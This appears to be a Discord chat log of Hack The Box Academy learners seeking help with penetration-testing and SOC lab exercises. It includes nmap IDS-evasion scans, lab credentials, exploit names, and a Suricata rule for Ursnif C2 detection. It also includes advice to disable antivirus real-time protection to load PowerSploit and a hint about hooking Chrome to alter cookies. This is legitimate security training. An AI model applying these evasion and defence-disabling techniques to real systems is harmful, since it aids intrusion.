#modules

🥹

That file upload module was something else. I have no idea why my brain made it 100X harder than it was for just the skills assessment.

see i am replying to randoms my brain is done for the night!

I was having little to no luck with fuzzing on this for some reason. If you can test it locally it helps out tremendously to be able to tweak the errors. If you can wrap your head around that hint?

Which ACE entry can be leveraged to perform a targeted Kerberoasting attack?

active directory mode

Attacking Splunk module
splunk only operate over https?

not even with a redirect from http to https?

Good morning everyone, I want to get advice from you

I am now 18 years old, I am a first-year student at the university

I am studying information security and want to become a pentester, but because of the high threshold for entering pentesting, I want to choose another IT specialty (to find a job earlier) and come to pentesting from it, I am thinking which one is better (I am currently considering a python developer because I already have the basics)
Thank you all in advance ♥️

Help desk

get A+ (or at least the knowledge of A+) and you will probably be good to go

#careers-and-certs is a good room for that information. If you like to poll that room for the question.

CDSA module finding evil, Windows Event Logs Section, Q2. I use the exact query in answers but still don't get any results. it does not return any event (Also I can't copy and paste screen shots here? :o) this is my query <QueryList> <Query Id="0" Path="Security"> <Select Path="Security"> *[EventData[Data[@Name='ProcessName']='C:\Windows\WinSxS\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.19041.1790_none_7df2aec07ca10e81\TiWorker.exe']] and *[EventData[Data[@Name='ObjectName']='C:\Windows\Microsoft.NET\Framework64\v4.0.30319\WPF\wpfgfx_v0400.dll']] </Select> </Query> </QueryList>

hello guys, i am facing issues while solving the live engagement section in the "shell and payloads" module. Everytime i connect the target machine via rdp i face network disconnect issues after every 1-2 minutes and also the ip of the machine not ping and after 2-3 machine again i can ping the machine and now rdp works but when connect via rdp it again disconnect after 1-2 minutes

here is the error:
┌─[us-academy-4]─[10.10.14.153]─[htb-ac-1202768@htb-jy72jrvllv]─[~]
└──╼ [★]$ xfreerdp /v:10.129.204.126 /u:htb-student /p:'HTB_@cademy_stdnt!' /workarea /smart-sizing /cert-ignore
[03:45:34:878] [9235:9236] [ERROR][com.winpr.timezone] - Unable to find a match for unix timezone: US/Central
[03:45:34:179] [9235:9236] [INFO][com.freerdp.gdi] - Local framebuffer format PIXEL_FORMAT_BGRX32
[03:45:34:179] [9235:9236] [INFO][com.freerdp.gdi] - Remote framebuffer format PIXEL_FORMAT_BGRA32
[03:45:34:199] [9235:9236] [INFO][com.freerdp.channels.rdpsnd.client] - [static] Loaded fake backend for rdpsnd
[03:45:34:199] [9235:9236] [INFO][com.freerdp.channels.drdynvc.client] - Loading Dynamic Virtual Channel rdpgfx
[03:47:11:309] [9235:9236] [ERROR][com.freerdp.core.transport] - BIO_read returned a system error 110: Connection timed out
[03:47:11:309] [9235:9236] [ERROR][com.freerdp.core] - transport_read_layer:freerdp_set_last_error_ex ERRCONNECT_CONNECT_TRANSPORT_FAILED [0x0002000D]
[03:47:11:309] [9235:9236] [INFO][com.freerdp.client.common] - Network disconnect

any hint ?

Try using remmina

[Help] Has anyone able to find the flag of this module section, Linux Privileges Escalation of Environment enumeration. I was able to get the root user and found the flag.txt. The code doesn't work. https://academy.hackthebox.com/module/51/section/1592

try switching to TCP run this in your terminal...

sudo sed -i 's/udp/tcp/g; s/1337/443/g; s/tls-auth/tls-crypt/g' /etc/openvpn/*.conf; sudo systemctl restart openvpn

if you're using pwnbox ^ , if not, then set ovpn connection file to TCP

WriteProperty, I think

@dapper moth, sup yo? what you working on?

(this "morning" UTC -6:00)

In Academy? Nothing! No more cubes to unlock any module

damn, props for helping out

Going for the Win Boxes in the labs now!

im doing the SOC Analyst, and im having to force myself to get thru these IDS/IPS modules, i thought they'd be a bit more "fun" dunno

I kinda liked the defense modules

not to say they're not educational, and informative, just less fun than like the offensive stuff

HTB made them pretty enjoyable

i dont know how to count bytes or recognize them in stuff like the wireshark output to be able to create the offsets for the customs rules and stuff, im definitely gonna have to return to this stuff later when i can create a vm lab that will better help me familiarize myself with this stuff

its little things like that, that kill me

you know, identify an alert trigger, find its location in the packet, count its offset and size and create/modify the rule so it alerts if a packet matching its type/size/regex/etc is found

likewise.

What module is this from? Might give a check

just a sec its a section or two back i need to find it

ok there's two, its suricata rule development.

https://academy.hackthebox.com/module/226/section/2415 <-- Offset

https://academy.hackthebox.com/module/226/section/2451 <-- find the string that should be seen in the content keyword of a rule

Thought it was Yara
I’ll check it out in a bit

oh yara, is that "easier"? i think thats a few sections next in line

Module> Files transfers with code - I am unable to install python2.7 as instructed as it will not accept my password for HTB-Student? Any one having the same issues?

.

moin

Guys. Which graphical tool do you use to create an Active Directory map or a network maps?
I currently have a lab with several computers on the network and I need to make graphic notes for convenient penetration testing

Theres a tool that builds a database, i cant remember the name at the moment, let me check my notes, i think tis bloodhound?

or do you need something different? zenmap creates a simple network diagram as well

@pulsar oak ^

yes, bloodhound

^^^ well, for AD. IDK about networks in general.

Oh right, zenmap is part of nmap

yeah im not familiar enough with nma pto know if you can output that info with an nmap option

its interactive though so i dunno

Yes, I needed something like zenmap, but do you know if zenmap supports proxychains?

not sure i know nmap supports proxy chains so i dont think zenmap would be any different. i just checked the nmap downloads page and found a zenmap installer that says "all platforms" (whatever that means) its an RPM tho

and it says "...noarch.rpm", btw 🤓

I got it, I'll try, thanks a lot!

I guess you are supposed to fine tune that offset parameter in the rules file

And run it with that pcap file so you can see when it gets detected and when not

I'll go through some of the stuff in that pcap to check the filter you'll need to find it

Oh i got the solution, its just that its new to me... so doing that feels very odd i just need to get a vm lab up and just repetitively do stuff like that and play around and stuff, but i find it a ilttle boring

ICS?

yeah now that im looking at another section here i realize what the problem is, i need to see the traffic for these types of attacks to be able to understand the rules, like see them from start to finish... make them even (playing both sides of the fence offense and defense) im not gonna fully understand this until i can do that

not sure what ICS is those are just screenshots from google for bloodhound and zenmap network map

Industrial Control Systems

Yeah. It helps in Wireshark

If you want to understand where that value comes from I found a good explanation to it. Can send you the stuff I just got

yeah i'd appreciate it im dealing with another exercise just like it

any tips on this?

analyzing the wireshark, but still unsure how to count bytes, offset, etc.

Hi guys , I am beginner can someone please explain how to get more cubes without subscription ?

Hi where can I report a finding with a question that i think is incorrect

You can also buy cubes. You don't need a subscription. But they are cheaper with a subscription.

#1234357888114364508

Without buying cubes or subscription is there any strategy to use 50 cubes to max advantage... As I am not sure to purchasing cubes or subscription based on my inexperience to continue to learn or not...

hi all where to ask questions about module exercises?

You can use the cubes you received with your application to study the Tier 0 modules. The modules cost 10 cubes and give you 10 cubes back.
All modules from Tier I cost money

In AD Enumeration & Attacks > any section but I happen to be in "Privileged Access".
Does anyone have insight as to why a call to Get-ADUser works when RDP'd into the box, but not through Win-RM?
In Win-RM I get the error "Unable to contact the server. This may be because this server does not exist [...]"

You're in the right place. Be sure to mention the Module & Section by name so we know what you're asking about.

so we have a machine which we have ssh access and that machine(A) is connected to network(B)..So we want to access the other network(B) we can do that by using dynamic port forwarding using socks..In which we set up a socks server in machine(A) we have access to and from the attackbox we send nmap commands to machine(A) SOCKS server through ssh tunnel and from Socks server it executes the nmap's packets on the machine(A) and Discover the network(B) ..Is my understanding correct ?

Yes that is strategy I am applying.. I was 70 cube while sign in.. now I have 50 cubes by joining Linux and networking fundamentals.. after I want to learn bash script but it will take away full 50 cubes that is problem... Using tier 0 course is good strategy..

Is there any other strategy? Means is HTB cpts available on YouTube?

Yes, this sounds like a pretty accurate summary. To be very precise, you have access TO network B. FROM network B, however, you have limited access back to your attack machine -- only by way of replying via TCP.

Only modules up to Tier 0 may be shown on YouTube. No walkthroughs are permitted for anything above Tier 0.

If you want to learn CPTS, you need cubes

Did you try "import-module ActiveDirectory" on the winRM PS before the command

Yes for cpts annual subscription is only good option..

No, you can also buy cubes. You don't necessarily need a subscription.

If you are a student you can get a discount.

Means for cpts it is 1980 cubes , i have to spend 200$ that too with no certificate so bad option maybe if we want certificate otherwise just for knowledge it seems great... Am I right?

Best way is to get a subs since you get a discount

I am not student..

Cubes turns out more expensive at the end if you do the math

For 100$ it is 1000 cubes...

A subs is $60 something

for 1000 a month

So 🤷‍♂️

For student and other the exam fee is same ?

cpts

You guys are lucky. HTB is even unlocking a whole bunch of modules if you're getting annual. When I started only low level were applied to this

But that does not include the exam. With the silver sub you get exam voucher

Yes, the ActiveDirectory module is loaded. I'd get a "bad command or filename" type response if it weren't.

The error I get suggests I'm unable to connect to AD which is weird. There's not some additional things I need to do with winrm to get connected to AD is there?

Hm interesting. Can you enumarete with PowerView through winRM?

For 490$ you get whole year access plus certification...

I'll check that too. I googled it and got some hits so let me see where that takes me.

Good strategy if you don't want certification...

This

And you were commenting on the 1000 cubes for $100

Share the outcome please when you figure it out.

Woah wait, zenmap is cool.

I went with monthly cause it didn't have the higher modules when I started and this was available after I unlocked many of the modules

so it wasn't worth

i cant access the #general

I made the math at the time

Thank you. I am not able to paste any screenshot here, idk why it doesn't work. CDSA module finding evil, Windows Event Logs Section, Q2. I use the exact query in answers but still don't get any results. it does not return any event (Also I can't copy and paste screen shots here? :o) this is my query

  <Query Id="0" Path="Security">
    <Select Path="Security">
*[EventData[Data[@Name='ProcessName']='C:\Windows\WinSxS\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.19041.1790_none_7df2aec07ca10e81\TiWorker.exe']] and *[EventData[Data[@Name='ObjectName']='C:\Windows\Microsoft.NET\Framework64\v4.0.30319\WPF\wpfgfx_v0400.dll']]
</Select>
  </Query>
</QueryList>```

See #welcome and follow the instructions to be able to screenshot and interact with the full discord server.

I'll let someone else help you with the CDSA module with which I am unfamiliar.

yes

Maybe you are unlucky on that time but now in your point of view silver annual subscription also good...

It isn't

Only a handful of modules to unlock

Finished all the tier 2 a while back

Did you tried cpts?

Haven't yet

Planing on it though...

If you get or cleared cpts . You probably also clear oscp don't know oscp+... That is what heard in internet..

Yeah.... First I was thinking on going for the OSCP but they are pricey as heck.

Best I can tell it's the "double hop problem" which is discussed a little later, so this is speculation based on my limited knowledge but I think with RDP your credentials are [typically, by default] cached in LSA and with Win-RM they aren't. I can execute the command if I create a PSCredential object and pass that as part of the call:

$user = 'INLANEFREIGHT\htb-student'
$user_pw = 'Academy_student_AD!'
$user_sec_pw = ConvertTo-SecureString $user_pw -AsPlainText -Force
$user_cred = New-Object System.Management.Automation.PSCredential($user, $user_sec_pw) 
$users="C:\tools\users.txt";
Get-ADUser -Filter * -cred $user_cred|Select-Object -ExpandProperty SamAccountName > $users;

You may complete cpts here then 700 or 800$ for only examination for oscp.. very bad for middle income guys like me..

For OSCP you need the Course & Cert Exam Bundle from Offsec

Can't we just purchase exam?

For OSCP no

I don't think so, but ask Offsec

I wanted to do that as well

Then it is too much for us.. it may cost more than 1500$, in India average yearly income is 2700$... unbelievable pricing...

Offsec is an American company that has to base its prices on the American market. Wages and living costs in America are significantly higher than in India.

Maybe after getting good job only it is possible..

Yes .. I got it.. They have to change there pricing depends on some demographic also .. Indian learning population earn them good business... But there maybe many loopholes..

That is why cpts best .. 500$ is not that much consider to 1500$... Just that cpts need more recognition.. atleast one competition needed to oscp...

Can someone give me a quick answer to which module is hardest between:

• Advanced Deserialization Attacks
• Modern Web Exploitation Techniques
• Advanced XSS and CSRF Exploitation
• Introduction to Binary Fuzzing

The costs for the servers, employees, etc. are always the same. No matter where the student comes from.

That probably depends on your previous knowledge

Have you done those? I mean.... I want a personal opinion

What did YOU specifically found to be the hardest I mean

i have a problem in the module Windows Attacks & Defense

Credentials in Object Properties. Can anyone help me and explain why the server DC1 doesnt create the correct logs ? I did all the steps correct but couldnt take the answer for the last question cause the server seems to not work properly

Only the web modules. But as I said, it depends on your prior knowledge.

For me, Advanced Deserialization Attacks was the most difficult of the three web modules mentioned

But it's because I don't know C# very well.

Have to plan which modules to unlock next when the subscription hit. Those are on the list

I can speak for the Advanced XSS and CSRF Exploitation, it was challenging and heavy but a lot of fun.

hey guys quick question im doing the password crakcing module and im doing the hard lab, i found this file also in the meduim lab any idea what it is? there are a bunch of passwords in it its like a list Users\johanna\AppData\Local\Google\Chrome\User Data\ZxcvbnData\1\passwords.txt

its for cracking

use it wit hashcat for example

for which reason is it on a target?

its not a target , etc. you can use these wordlist-passwords.txt for cracking another files with hashes

i dont really understand? The passwords are in clear also btw

Thanks, @acoustic owl and @old oasis
Guess I'll go for something like that next

If you searching about any hacking tools I can bring it up for you

hello everynoe pls help

windows prv escalation : other files

Using the techniques shown in this section, find the cleartext password for the bob_adm user on the target system.

I used all methods but not worked

thats the point its clear in order to crack

guys

Hey guys
Im trying to do this right now
Once you decode the cookie, you will notice that it is only 31 characters long, which appears to be an md5 hash missing its last character. So, try to fuzz the last character of the decoded md5 cookie with all alpha-numeric characters, while encoding each request with the encoding methods you identified above. (You may use the "alphanum-case.txt" wordlist from Seclist for the payload)
I have decoded it then I made chatgpt write a python script that will take the cookie and append the alphanum-case.txt file one by one to the end
Then I took that text file and put it into intruder in the cookie field
But none of the pages returned in intruder are a succesfull login
Ive been stuck on this for an hour

you don't need to have a python script after all burpsuite offers a brute force option itself

wth, i was having trouble with a lab so terminated and respawned it and got a totally wrong lab 🤣

Can anyone please give me any free course name like HTM and THM free videos on Junior Penetration whether on YouTube or any other ... Has to be interactive like THM and HTM...

For Web:
https://portswigger.net/web-security
https://www.apisecuniversity.com/#courses

Here you can find videos from IppSec, which he has recorded on various machines
https://ippsec.rocks/
Just search for the topic you are interested in

Thanks a lot buddy...👍

In the modules where it says how long it takes to finish (for example, 8 hours), does that mean you have to be working for 8 hours straight, or can you work over a span of 8 hours to complete it? Also, for the modules that say "2 days," how long would you need to work each of the 2 days to finish?

No. It’s a guesstimate. Some can be finished sooner and some later. It all depends on the person doing it

It's an estimation

ok i understand now thanks for the answer

GUYS i need help i can not delete my htb account

Reach out to support

https://help.hackthebox.com/en/articles/5986762-contacting-htb-support

i need to open ticket?

yes

ok wait

i had academy account i cant see open ticket area

green bubble or email

ı dont understand

Take a look at the link above

ı speak with ai but ı can not understand how can ı delete my account

@acoustic owl

same here..i am also not getting acces to ticket area.. mine is 2 days acccount..

why yout delete account text is seem grey right?

probably wrong guy reply.. i didn't delete account...

is it a good idea for using something like ubuntu instead of a virtual machine?

There is little confusion here... Is ther HTB ticket just like THM

depends on your experience level with Ubuntu. if you're new to it you're probably going to have a rough time compiling all the tools etc. easiest is to just run a kali vm or use the pwnbox.

There is little confusion here... Is ther HTB ticket just like THM

I saw Tickets in THM not in HTB....

thank you

The link I posted above explains how you can contact support.

https://help.hackthebox.com/en/articles/9189654-manage-your-htb-account

Ok I got it, I got confuse with his complaint ticket with THM Tickets... IT is nothing to do with what I thought...

No, THM has nothing to do with HTB

Yes.. I was just going throgh or studying in both websites.. so got confuse... there is one section of Tickets in THM, I thought HTB also have it.. so that is why I asked where is HTB Ticket... My mistake..

hello guys, help me.
how can I change chrome browser cookies using third-party desktop apps.

maybe API hooking? DLL?

Which module are you working on?

SPOILER ALERT I DONT WANNA SPOIL BUT NEED A LIL HELP

hey i am working on NMAP IDS/IPS evasion - Medium Lab and after running my scans i am getting version to be ||NLnet Labs NSD|| but it is not working because i feel like it aint the version or like the full version name, can anyone please lmk if this is correct or not ???|| i found it from udp scan port 53 running version NSE script i also used my source port as 53 too||

You're on the right path. You'll learn that if one way isn't working try another.

plenty of people have completed the module

umm alright i will try something aroung that then

just ask your question and people can help

Just to be sure, because I don't remember what the service is called (e.g. NLnet), do you want to confirm the port number for a sanity check? You can mask it here with spoiler tags or DM.

||53/udp||

Hum... ok, give me a minute. I was looking at my notes for "hard" and don't have anything down for medium.

oh alr

Oh yeah.. ok I think you're good. you're looking for a DNS server so, yeah, ||tcp/udp 53||.

yup but i am not able to catch the version for it

||sudo nmap -sU 10.129.102.200 -p 53 --reason -D RND:10 -Pn -n --stats-every=10s --script=version -sV --source-port 53 ||
this was my scan

I'm firing up the lab to see if I can remind myself how it's done, but same advice applies: if one way doesn't work try other ways. The version will be in flag form, e.g. HTB {...}

ohhh alrr thankyou i will keep looking

Ok, there are at least a couple ways to get the flag. There's a lot of unnecessary crap in your command, but it does return the flag for me. If it's not working for you, make sure the ports you expect to be open are actually open with a simpler scan. Ping should work too. Sometimes the labs get goofed up and you have to terminate/restart.

wait it IS returning flag for you ?

yuppers

guess i should do it in the pwn instance instead of my machine

give it a try. It'll work from your system too if assuming you're vpn'd in

i want to download the .ovpn file but the exercise doesn't have the link .

@shut vapor that was super quick doing it in the pwn

idk man why these issues pop up even when i AM using the vpn

Good you got it working. It seems to steady out after you get used to the workflow. If things seem like they're not working for me I typically do a few tricks:

• Terminate / Restart the lab
• Terminate / Restart and redownload the .ovpn file
• Switch regions then terminate / restart and redownload the .ovpn

oh no i'm sorry i haven't done that module yet

Sorry, I haven't completed that module either.

yea i did that too but nvm the pwn works so gg

uk what i found the issue

why it didn't work

oh?

it was because i was connected to the tcp vpn and now that i switch to udp it worked like a chrm

I'll have to keep that in mind to recommend. I've heard from a few people the TCP version works a little better now that I think of it.

no but when scaaningn for the udp ports tcp didnt work for me

i even re routed it with new ffile but no luck there

TCP works better for RDP

stable connection

use the script they provide

i am

thats the same exact script they provide yet i get no response

try replacing wget -q with curl -O

someone???

download it from htb labs

i cannot use the pownbox then i want to get the bpn file

Scroll up, the link to download .ovpn is above where you click to spawn a lab.

academy

there are no link

Hey is the correct room to ask a question regarding one labs in the modules?

¯_(ツ)_/¯ If it's not there... you've turned off script blockers? Refresh the page? I don't know, you'd have to talk to support.

Yes. Be sure to mention the module & section by name so we know where you're asking. Also see #welcome and follow the instructinos to link your account. Then you can share screenshots and see the rest of the server.

hey @shut vapor could you help me w something real quick? i just wanna know which one of these are absolute useless and served no purpose whatsoever , i feel like those are

1. -Pn cause the host is up and not blocking anything
2. -D because this port is accessible and i dont need to mask around too much

Run the command 10 times and remove portions of it until you figure it out.

seriously this section doesn't appear. Is it possible to download it from the other module?

fair enough, " F around and Lean " - someone idr

But youre interpretation of -Pn is inaccurate. This tells nmap not to ping the host first, just assume it's up.

oh yea thats that my bad

thankyou alot for the help today i appreciate it man

Alright cool, identified. Im doing Password Attacks Lab - Medium. I was able to get the zip archive I need to crack, and converted it to a crackable hash with zip2john, and was able to run it against john to try and crack it. I tried the provided password list from resources, I tried the mutated list, and I tried rockyou and a bunch of other wordlists. I tried hashcat as well just wondering if it was a problem with john, but also to no avail. I ran incremental mode in john for the heck of it for a few hours, and nothing there. Am i missing something?

Are you sure you tried all 3 lists with hashcat? That path worked for me.

^

You shouldn't have to set RPORT to 80/443 if the web server is on 8080. Is there a separate port specification for VHOSTS? like VHOST_RPORT? I forget. If you share a screenshot of the options it might jog a memory.

im pretty sure but ill retry lol. Is there any reason why john would treat the lists differently than hashcat that you're aware of?

As far as I'm aware john would work just fine.

I've just got hashcat cooking on my GPU so it's my goto.

Well that makes more sense to me & sounds familiar. Set RPORT to 8080 and you have to set the VHOST too. Is there still some confusion?

SNI is pretty cool. Let me tell you about the bad old days... 👴

yeah hashcat was able to work, for some reason john wasn't able to crack it with the same lists and it was correctly going through the wordlists. I reinstalled it and still had the same problem. For hashcat I forgot to remove the stuff up to $pkzip$ so i was using the wrong mode... live and learn lol

Good news. And, yeah, do a lot of experimentation with that module to play with as many tools as possible. You'll find a preference for one over the other depending on circumstances. Though, more for password attack tools (e.g. netexec vs medusa vs hydra vs etc..) than hashcat and john.

Module: Information Gathering - Web Edition
Section: Web Archives
Due to the cyberattack on the Wayback Machine on October 9th, is there any way to complete this section moving forward? I answered the first 3 questions before the attack but did not complete the last 3 questions.

Hi, anyone here who has completed the new wifi penetration testing module? I'm Stuck at the live engagement.

I don't believe you can at this time. I'm in the same boat.

I just moved on for the time being

What exactly is not working?

i dont know if this is the right channel to ask but i cant acces to the cheat sheet or even use hints accdidently i closed the machine before doing this question " Start your workstation, then use the integrated terminal to find the Linux OS flavor by running the following command: cat /etc/issue "

its my first time to use the wsbsite soo

I'm unable to capture the handshake in order to answer question 2. I deauthenticated the Client from the Wifi Network and started airodump-ng again. But the Handshake is missing..

well this aint helping

payloadbunny, if you're still there would you mind if I dm'd you real quick before submitting something to erratum?

Take another look at the module.
During the deauth you have to keep the scan running.

sure, send me a dm

I see, thanks I'm going to try that.

is edu.tr supported in HTB?

as student?

i beleive only their pre-approved list and if you're not in that you need to reach out to support

i could be wrong on that but i think i remember reading something like that

Thank you so much it worked!

i cant buy any modul with cubes i am clicking the button and nothing happening

just the screen little shaking

disable all adblockers and try again

is there any problem going on with module Attacking Domain Trusts (Linux)? I changed twice vpn servers, changed pwnbox twice, same with the target. No matter what I change "@ea-attack01" keeps crashing/frozing and I lost conn with it.

well i am using brave it have attaches adblocker soo

should i try with another browser?

Module: Vulnerability Assessment
Section: Nessus Skill Assesment
My Nessus instance is unreachable, i dont get any resposne from spawned server. Could anyone check if yours work good.

Spawn target: https://spawnedip:nessusport

it worked

You need to specify https

yhyh it seems it doesn't work at all i specified port and used https but unreachable, i will try to change vpn region

People, people!!!!

I got an announcement

More like invitation

Do you wanna hear my suggestion

Anyone here who has a tip on connecting to the wifi network? The network is hidden so i think i have to use the terminal. I already created a wpa.conf file which contains the ssid and password. However I'm unable to connect using wpa_supplicant.

We're going insane cuh yk i'm sayin

<@&861185840277487616>

Rat

get out of here nerd

You get out fake profile catfisher

I'm staying right here!!!

ok noodle arms

Go shave your mutton chops

🤓

https://tenor.com/view/nerd-well-actually-as-a-matter-of-fact-gif-27665011

Please stop spamming, my question is moving out of the screen 😭

No one cares bro

People won't answer, get that

This world is full of bad people and they don't care

Nah, the HTB Community is pretty chill

No bro every community is manipulative and calculated

Feel free to DM

the security logic is undeniable, you cant hack stuff if you can't even login

don't run the vpn and pwnbox at the same time

use one or the other

I don't, but that's the point, because both are not working, I am very sure the ACADEMY-EA-ATTACK01 is having some crazy stuff running there, because I can connect using pwnbox, I just can't keep connected

If it is an issue with it, then reach out to support

Tech issues on htb end can't be solved on discord

Run everything just like in the module

If you have a question shoot it

I have a question I am beginning hacking and I don’t know what too work on first

I joined hack the box

I know nothing about computers where should I start

https://www.hackthebox.com/blog/learn-to-hack-beginners-bible

Obviously I can do basic stuff like play games and watch YouTube but nothing beyond surfce level except right a few lines of python

Thank you bro

Im on the public exploits module and im just a bit stumped as to where im supposed to go. i used nmap to get the ports and versions running, then searchsploit on 2 of the ports that returned versions, one had no results but the other one had quiet alot. but now what?

||since im trying to get a flag im guessing i want an exploit that gives me RCE which there was two of to try:
Apache + PHP < 5.3.12 / < 5.4.2 - cgi-bin Remote Code Execution | php/remote/29290.c
Apache + PHP < 5.3.12 / < 5.4.2 - Remote Code Execution + Scanner | php/remote/29316.py||

I'm on introduction to windows command line and I got stuck on import modules to powershell for some reason I can't seem to import powersploit since it being flagged as malicious. Is there a work around I can use to navigate this problem.

is this the getting started mosule?

yes

did you set the execution policy?

try unrestricted

why do u need nmap, did you open the ip on your browser

I did try unrestricted but it still didn't work.

why are you using psd1

Hey guys anyone can help? Im on the password cracking module on the hard lab, i found the bitlocker password tu mount the file i found, i tried to mount it on the target (windows) but need admin password that i dont have for the moment, im trying to mount it on linux but i encounter some problems can anyone help in dm?

where did you get powersploit (the link)? you could try disabling real time protection

Thank you ... it did run after disabling real time protection.

ohhh ok, i had opened it but it hadnt really registered xd i did find an exploit but just need to figure out the username/pw

which im guessing i shouldnt need to just brute force common username pw

you dont need any credentials

what should i be searching for then? ||search backup plugin 2.7.10|| only returns one result and thats the exploit im trying to run but get a failed to login to wordpress

try google

ok so i finally got it still feel kinda dumb cause while i was almost there the thought of ||setting the filepath to /flag.txt|| never crossed my mind

Hi, everyone, how are you? I hope so.

I would like to know if anyone has completed the "Active Directory LDAP" module. I'm stuck on an exercise and would really like some help.

Credentialed LDAP Enumeration

What user account has their userAccountControl value set to ENCRYPTED_TEXT_PWD_ALLOWED (store passwords using reversible encryption)?

To complete this exercise, I need to use the credentials provided by the exercise. However, when I use them, a credential error is displayed, but I'm not wrong. I use ldapsearch-ad.py, but the response is not returned. So, I try using windapsearch.py, and the error is displayed. How come the credentials work in one tool and not in another? All that's left is this exercise to complete the module 100%.

To the Administrators of the Modules,

I have recently completed the “Windows Attacks & Defence” module and would like to share my observations. This module presented more technical difficulties than any other I have tried so far. There were more technical issues unrelated to the subject matter than expected, to the point where it diminished the motivation and interest in completing the content. I kindly request that you address these issues, particularly with regard to the remote sessions, as well as other malfunctions that were observed.
P.S. On several occasions when I found the solution, I had to apply techniques that were not taught in the module in order to arrive at the answer.

need help w burpsuite module pleaseeee

its requiring me to intercept the source code so i can change the type and lenght values

but idk how to intercept it , i only get the GET request info

the content-type is a header

in burp it's a checkbox u can select which should automatically adjust for the length

is there anyone here that works for Hackthebox

I have some Question about the Silver Annual Subscription

the Academy version

need to get this info

Did u go into ur settings and check off intercept response

check that off and then press the intercept box in the intercept tab and then make the request again in ur browser

Hi all, I had an issue with the Blind SQL Injection module, for Time-based Oracle Design, it wants the 5th letter of the db_name(), I have found it and the time-based response time confirms it but the answer is not being accepted?.

Don't believe I can upload screenshots in this channel, but I have an ss of the query resulting in a delay for the correct character and no delay when using !='{char}'

figured it out thanks

i didn’t fully resfresh the page

try to find people from the CWEE channel cause not a lot of people are doing those modules here

Idk my script gave me the right answer right way but a friend of mine had the same problem

This what he sent me "it was an oracle problem - I needed to change the delay.."

Perhaps something alike

It seems its because I was doing the SQLi in the GET param and not the user agent

need to make the module script work now though

how do I contact support about a module lab

Bottom right hand corner there should be a button and it'll guide you through contacting

I'm stuck in the very last flag of login brute forcing skill assessment can't find the password, can someone help? Already try brute forcing with .txt is inside de ssh and didn't help, also tried with some passwords from seclists and didn't help neither,

Also, is the step by step worth it? Like it could help me in cases like this ?

If you have annual subscription then you can use if you dont it doesnt let you use it but if your stuck then id recommend checking if it helps

And if you dont have annual subscription you can check writeups done by ppl or videos

I'm new to htb, and am currently doing some basic stuff, going through the different OS. However I'm stuck at the very last question of the Windows module, https://academy.hackthebox.com/module/49/section/1015

All other questions are ok, but the last one I just get wrong answer.

Shouldn't it be enough to just do a New-LocalGroup -Name "HR"
then get the SID by doing Get-LocalGroup -Name "HR" | Select-Object Name, SID

What am I doing wrong?

Nevermind, I finally got it right...by calculating the sid backwards. So the correct sid in the VM was the wrong answer, seems like it is a static sid and you must create everything in the correct order and not deleting anything.

yeah you'll need to do it in the target provided, non default users/groups starts allocation from 1000
https://learn.microsoft.com/en-us/openspecs/windows_protocols/ms-azod/ecc7dfba-77e1-4e03-ab99-114b349c7164

Frustrating, but great to finally get it right. Now lets go on with some more fun stuff with nmap.

For login brute forcing skill assessment part 1, are we simply brute forcing using the entire username and password list given to us? No information is given regarding usernames, password requirements, an individual's or company's name, etc.

Hey I've a question on the module : Windows Server Update Services (WSUS) in Windows Lateral Movement section, I did the same things than the solution but it didn't work, someone has an issue with that module ?

Yes, just brute force with the info given

I do not have annual subscription but I want to know if the step by step feature can help me before buying it

I might be here a while then 😅 It's been an hour so far with no matches

Internet Archive seems to be back online (https://web.archive.org/)

GM guys

need some clarification on Knowledge Check machine box

I have got root but I would like to ask something without spoiling it here

anyone to hit me on DMs?

no scammers please lol

ask in #boxes

<@&861185840277487616>

thanks @next bronze

Hey i am doing pentration tester path. Can i skip modules i find hard and come back to it later? Or i have to do it in order?

hello, i'm a noob and i have a question
a friend had a suitcase stolen, inside there wasn't much of value unfortunately, but there was among other things an old samsung B2100 phone (very old therefore) as well as a tablet with Lineage OS, and apparently no possibility of locating the device through the google account; but the tablet is connected to his discord account.
Is it possible to locate one of the devices, and therefore the case, using this method alone?

whats that got to do with the academy modules?

I didnt arrive to text the general channel 😅😅

Bruh I can't ping the machine even though i am connected to the vpn

This channel is specific to HTB academy modules, what youre asking is unrelated

is the machine from the academy or labs?

academy

i am trying to rdp

from what I know when you make a new vpn file it will make the previous one redundant so make sure you use the latest one

cant ping it on vm instance either

we cant help you on this

Some build upon each other but you can skip around. The early stuff is pretty fundamental. Nmap, e.g.

is it possible to reset progress in a module so i can do the assessment tasks again from scratch?

no

sad

that shouldn't stop you from doing the assessment anyway

just don't look at the answer

also the answer is not that important its more the steps you took to reach it

yeah, lol. But still i missed the feel of getting the answer right after submitting it in the task.

do you have problem on your side to ping machines ?

And also it is hard to read only the task questions without looking at the answers mistakenly.

try nc -vz 83.136.254 158 47683

but if it is a docker and it hosts a website then you are missing the path ...

you can't just "connect" to it with curl if such is the case

I'm just trying to do this https://academy.hackthebox.com/module/23/section/253

no

Hi I'm stuck at the Password Attacks Module on network services. I've found every credentials except for rdp. I know that the method is the same you just have to change the service name in hydra. There is a reddit post where someone also says that the rdp brute forcing did not work for him. Is it working for you guys? Do you have any alternatives?

use the resources given to you in the module

I did that

You can DM me

https://academy.hackthebox.com/module/87/section/883
following this guide rn i followed it and updated all that stuff but when i type cat tools.list like it says instead of printing all tools i have it prints "No such directory"

mind you following the guide and updating it took around a good hour or so to complete so...

Make sure you have the right spelling

Could be tools.lists maybe?

Or capital letters

huh it works now same spelling as before... weird... but thank you!

I want htb to make a module "How to get a job in cybersec and get paid for it"

Archive is back online and I was able to complete this section in case you hadn't already seen.

Did you end up getting this, I can help

yeah I got it

thanks

just had to be patient

Did you automate the VRFY process?

yes I did

Nice, could you send me the script? I did it manually 😭

ofc

Thanks bro

Im having trouble counting packet bytes in the IDS/IPS modules, of the SOC Analyst Path

(paritcularly the walk thru with urisnif https://academy.hackthebox.com/module/226/section/2416)

Can someone help me better understand why when i count 12 bytes like the rule suggests i dont end up at the /images content?

Rule:
alert tcp any any -> any any (msg:"Possible Ursnif C2 Activity"; flow:established,to_server; content:"/images/", depth 12; content:"_2F"; content:"_2B"; content:"User-Agent|3a 20|Mozilla/4.0 (compatible|3b| MSIE 8.0|3b| Windows NT"; content:!"Accept"; content:!"Cookie|3a|"; content:!"Referer|3a|"; sid:1000002; rev:1;)

if i start in the highlighted section, sure images is within the first 12 bytes, but the rule says the first 12 bytes of the packet (payload?) which is not the same, as i understand it?

